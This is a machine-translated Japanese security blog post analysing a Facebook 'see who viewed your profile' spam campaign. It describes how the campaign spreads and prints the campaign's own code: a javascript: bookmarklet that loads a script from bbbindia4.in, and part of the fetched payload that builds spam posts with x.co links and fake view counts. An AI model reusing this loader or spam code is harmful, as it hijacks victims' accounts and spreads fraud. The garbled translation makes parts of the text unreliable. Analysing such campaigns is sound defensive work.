Facebookでの新しいスパムの波

今日Facebookでは、「あなたのプロフィールを見た人をどうやって見るか!!」というテーマでスパムの波が始まっています。 次の3つの方法で配布されます。

• 攻撃されたユーザーがオンラインの場合のIMメッセージ
• 感染したユーザーの表示に関する統計情報を使用して投稿のユーザータグ付け（もちろん、詐欺の精神で「他人のsmsを読む」および「ユーザーの動きの履歴を見る」という統計情報は偽物です）
• イベントへの招待（イベント）。

3つの方法すべての目標は、攻撃されたユーザーをサイトhttp://iamnewc.blogspot.com/に誘導することです。このサイトは、 http： //x.co/WlL4/？$ PARAMのGoDaddy x.co URLのショートカットの後ろに隠れています。 facebookのユーザーに関連付けられていると思われる特定の番号。



さらに、最近のFacebookユーザーに対するセンセーショナルなフィッシング攻撃で使用されているソーシャルエンジニアリング手法に似ています：JavaScriptコードをクリップボードにコピーし、Facebookにアクセスして実行することをお勧めします（アドレスバーに貼り付けてEnterキーを押す）：

javascript:(a=(b=document).createElement('script')).src='// bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)







そして、このページ（ http://bbbindia4.in/jsp.php ）から順番にロードされ、実行されます：

var randomnumber=Math.floor(Math.random()*99999); var randomnumber1=Math.floor(Math.random()*987); var randomnumber2=Math.floor(Math.random()*754); var randomnumber3=Math.floor(Math.random()*43); var randomnumber4=Math.floor(Math.random()*9); var random=Math.floor(Math.random()*5); if (random == 1) { var url = ' x.co/WleP?' } else if (random == 2) { var url = 'http://x.co/WleV/?' } else if (random == 3) { var url = 'http://x.co/Wled/?' } else if (random == 4) { var url = 'http://x.co/Wlek/?' } else { var url = 'http://x.co/Wlem/?' } var message = '%firstname% See who views your profile '; var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A '; var test = 'My Top Profile Viewers Are:\x0A'; var id = '%tf% - ' + randomnumber1 + ' views,\x0A'; var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A'; var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A'; var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A'; var post = ' see who viewed your facebook profile @ '; var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber; var chatmessage = message + url + randomnumber; var redirect = 'http:// www.gameindiagame.blogspot.com'; var eventdesc = ev + url + randomnumber; var eventname = 'How to see who viewed your profile!!'; var nfriends = 5000; //







更新 x.coから省略された最後のフラグメントで言及されたURLは機能しなくなりました。 GoDaddy Securityによって削除される可能性があります。 しかし、 www.gameindiagame.blogspot.comでは、少なくともFacebook Verification Spam Botの碑文に感心することができます:)。 当然、シークレットモードを使用することをお勧めします。